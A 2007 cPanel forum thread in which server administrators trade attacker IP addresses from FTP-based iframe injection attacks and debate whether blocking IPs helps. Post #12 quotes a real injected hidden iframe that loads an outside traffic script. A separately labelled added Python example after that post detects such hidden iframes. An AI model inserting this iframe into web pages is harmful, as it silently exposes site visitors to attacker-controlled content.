  1. #1
    Member
    Join Date
    Mar 2003
    Posts
    601

    IP addresses from IFrame Hacks

    Here is the IP address and approximate times my servers were hit:

    84.16.252.163 - Sept 30th 12:01:23 - 12:13:46 CST

    84.16.252.163 - Oct 2 12:01:46 - 12:05:03 CST (2nd attack)

    (this is a sub-posting from thread http://forums.cpanel.net/showthread....d=1#post334464)
    Last edited by noimad1; 10-06-2007 at 03:35 AM.

  2. #2
    Member
    Join Date
    Oct 2007
    Posts
    13

    Hi

    66.36.241.185 8:30pm Australian Eastern Standard Time +10:00 1st Oct
    66.36.241.185 4:20am Australian Eastern Standard Time +10:00 2nd Oct

  3. #3
    Member
    Join Date
    Nov 2002
    Posts
    153

    Quote Originally Posted by noimad1 View Post
    Here is the IP address and approximate times my servers were hit:

    84.16.252.163 - Sept 30th 12:01:23 - 12:13:46 CST

    84.16.252.163 - Oct 2 12:01:46 - 12:05:03 CST (2nd attack)

    (this is a sub-posting from thread http://forums.cpanel.net/showthread....d=1#post334464)

    Exactly the same here, same time, date & IP.

  4. #4
    Member serversphere's Avatar
    Join Date
    Jan 2004
    Posts
    658

    This thread should probably be made stickied... gl to all those looking for an answer.

  5. #5
    Member
    Join Date
    Mar 2003
    Posts
    601

    Quote Originally Posted by simplybe View Post
    Exactly the same here, same time, date & IP.

    Interesting... Well, that makes me feel a tiny bit better that this might not be a server compromise...

  6. #6
    Member
    Join Date
    Nov 2002
    Posts
    153

    New IP 72.29.95.226, same method as before.

  7. #7
    d_t
    Member
    Join Date
    Sep 2003
    Location
    Bucharest
    Posts
    231

    81.95.149.75 - October 2, 2007
    (client confirmed he used FTP from an infected PC the day before)

  8. #8
    Member
    Join Date
    Apr 2005
    Posts
    105

    Since June, the ones I have caught:



  9. #9
    cPanel Partner NOC cPanel Partner NOC Badge rvskin's Avatar
    Join Date
    Feb 2003
    Posts
    397

    Here is my collection.

    66.246.218.145 # Sep 09 2007
    84.16.252.163 # Aug 29 2007
    194.83.36.2 # Aug 30 2007
    69.41.162.77 # Sep 27 2007
    213.27.26.11 # Sep 27 2007
    116.0.103.111 # Oct 9 2007
    202.164.52.199 # Oct 9 2007
    RVSkin, a great experience for you, resellers and clients!
    http://www.RVSkin.com - The Most Intelligent Cpanel Skin, 23 Languages included.
    http://www.RVSiteBuilder.com - Website Builder for Hosting Provider.
    http://www.cPanelLicense.com - External cPanel License.

  10. #10
    Member
    Join Date
    Nov 2002
    Posts
    83

    66.36.241.185 on 8 servers.

    Ronald

  11. #11
    Member
    Join Date
    Nov 2006
    Location
    Houston, TX
    Posts
    300

    Thanks for the information.

    Keep it coming.
    -Todd Shipway

  12. #12
    Member
    Join Date
    Aug 2003
    Posts
    45

    81.95.150.178 on October 8

    <IFRAME name='StatPage' src='http://www.911traff.com/trf/traf.php' width=5 height=5 style='display:none'></IFRAME>

    Looks like a one-off case, as I am still checking the other accounts and logs.
    Last edited by Imai; 10-13-2007 at 03:24 AM.
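
Added example, not part of the original post or the thread: a small Python check that flags iframes shaped like the one quoted in post #12 (hidden by style or only a few pixels in size, and loading from a host that is not the site's own). The sample page, the host names, the `MAX_VISIBLE_PX` threshold and all function names are assumptions made for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

MAX_VISIBLE_PX = 10  # assumption: a frame this small is treated as hidden
HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)

# Constructed sample page: one legitimate embed, one frame shaped like post #12's.
SAMPLE = """<html><body>
<p>Welcome</p>
<iframe src="https://www.example.org/map" width="600" height="400"></iframe>
<IFRAME name='StatPage' src='http://stats.example.invalid/trf/traf.php' width=5 height=5 style='display:none'></IFRAME>
</body></html>"""


def _px(value):
    """Parse a width/height attribute such as '5' or '5px'; None if not numeric."""
    m = re.fullmatch(r"\s*(\d+)\s*(?:px)?\s*", value or "", re.I)
    return int(m.group(1)) if m else None


class HiddenIframeFinder(HTMLParser):
    """Collects iframes that are hidden or tiny and load from a foreign host."""
    def __init__(self, own_hosts):
        super().__init__()
        self.own_hosts = {h.lower() for h in own_hosts}
        self.findings = []

    def handle_starttag(self, tag, attrs):  # tag/attr names arrive lower-cased
        if tag != "iframe":
            return
        a = {k: (v or "") for k, v in attrs}
        host = (urlparse(a.get("src", "")).hostname or "").lower()
        reasons = []
        if HIDDEN_STYLE.search(a.get("style", "")):
            reasons.append("hidden-style")
        if any(d is not None and d <= MAX_VISIBLE_PX
               for d in (_px(a.get("width")), _px(a.get("height")))):
            reasons.append("tiny-size")
        if reasons and host and host not in self.own_hosts:
            self.findings.append(
                {"line": self.getpos()[0], "host": host, "reasons": reasons})


def find_hidden_iframes(html, own_hosts=()):
    finder = HiddenIframeFinder(own_hosts)
    finder.feed(html)
    finder.close()
    return finder.findings
```

Calling `find_hidden_iframes(SAMPLE, own_hosts={"www.example.org"})` reports only the frame on line 4. Frames written into the page by script rather than present as markup are not seen by this check.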

  13. #13
    Member
    Join Date
    Oct 2007
    Posts
    144

    81.95.150.82 Sept 1st to now
    Kind Regards
    SAR-Holdings Limited t/a SAR-Hosting
    http://www.sar-hosting.co.uk

  14. #14
    cPanel Product Evangelist Infopro's Avatar
    Join Date
    May 2003
    Location
    Pennsylvania
    Posts
    7,172
    cPanel/Enkompass Access Level

    Root Administrator

    Quote Originally Posted by cPanelTodd View Post
    Thanks for the information.

    Keep it coming.

    I don't want to sound pessimistic here, or take this thread too far off topic, but is posting these IPs really going to be helpful? Anyone who watches their logs can tell you the hits just keep on coming; block one, another pops up. Block 130 (my max for CSF entries to blocked list), another 130 more blocked next month.

    Soon as they are found out at hopone or ipowerweb or rbnnetwork or netdirekt.de or hostfresh.com or any one of a zillion other places, they're already set up on someone else's server continuing to do what they do.

    Trying to track down how it's happening is a good thing, keeping track of IPs may be good as well, but this'll go on forever. (the thread)

    Wouldn't it be more advantageous to all concerned if we as system administrators were sharing our security tips instead? A nice long thread with the top security tips would surely be more helpful, IMHO of course.

    For one example, many have Fantastico installed, but did you know that just because Fantastico tells you all files are up to date, and all installations are listed as up to date, that doesn't mean squat? Users will install components to Joomla that are very buggy and can be cracked:
    http://help.joomla.org/component/opt...86/Itemid,268/

    That's just one example, there are thousands of examples we could be sharing that I think might really be more helpful than this list of IPs.


    We're all in this boat together here as cPanel admins, and while sharing tips might be actually helping your competition in this hosting business, at the same time those who have no clues about security are a huge part of the reason others of us are having problems.

    Some kid (no offense kids) gets his own cPanel server, gives all his buddies free accounts and they get broke into because that kid didn't secure his server properly and his buddies are so excited to have a free account they install everything under the sun without knowing the consequences. And the end result is what we're all discussing here.

    cPanel is great stuff, but installing it and using the built-in security is not enough. Not by a long shot. I watch my logs via WHM daily, using logview, I get system logs by mail every hour, and I can tell you the hits just keep on coming, every hour every day every month.

    You can block IPs until the cows come home, that's not going to keep you secure.

    Anyway, sorry for the rant, just my 2¢.

  15. #15
    Member rpmws's Avatar
    Join Date
    Aug 2001
    Location
    back woods of NC, USA
    Posts
    1,858

    Quote Originally Posted by Infopro View Post
    I don't want to sound pessimistic here, or take this thread too far off topic, but is posting these IPs really going to be helpful? Anyone who watches their logs can tell you the hits just keep on coming; block one, another pops up. Block 130 (my max for CSF entries to blocked list), another 130 more blocked next month.

    Soon as they are found out at hopone or ipowerweb or rbnnetwork or netdirekt.de or hostfresh.com or any one of a zillion other places, they're already set up on someone else's server continuing to do what they do.

    Trying to track down how it's happening is a good thing, keeping track of IPs may be good as well, but this'll go on forever. (the thread)

    Wouldn't it be more advantageous to all concerned if we as system administrators were sharing our security tips instead? A nice long thread with the top security tips would surely be more helpful, IMHO of course.

    For one example, many have Fantastico installed, but did you know that just because Fantastico tells you all files are up to date, and all installations are listed as up to date, that doesn't mean squat? Users will install components to Joomla that are very buggy and can be cracked:
    http://help.joomla.org/component/opt...86/Itemid,268/

    That's just one example, there are thousands of examples we could be sharing that I think might really be more helpful than this list of IPs.


    We're all in this boat together here as cPanel admins, and while sharing tips might be actually helping your competition in this hosting business, at the same time those who have no clues about security are a huge part of the reason others of us are having problems.

    Some kid (no offense kids) gets his own cPanel server, gives all his buddies free accounts and they get broke into because that kid didn't secure his server properly and his buddies are so excited to have a free account they install everything under the sun without knowing the consequences. And the end result is what we're all discussing here.

    cPanel is great stuff, but installing it and using the built-in security is not enough. Not by a long shot. I watch my logs via WHM daily, using logview, I get system logs by mail every hour, and I can tell you the hits just keep on coming, every hour every day every month.

    You can block IPs until the cows come home, that's not going to keep you secure.

    Anyway, sorry for the rant, just my 2¢.

    You are correct!! I agree with you almost 100% with everything you said in general except one thing. These FTP login defacements, or whatever you want to call them, come from legit logins that have been snatched from locally exploited machines (I think) (or a compromised billing system that stores logins). At least that is what I have always thought. If that is the case... then the only way to keep them out is to either block or disable FTP or block the known IP(s) they came in from.
    Just keeping my "eye" on things....
    R. Paul Mathews
    RPMWS - diehard cPanel Nutcase
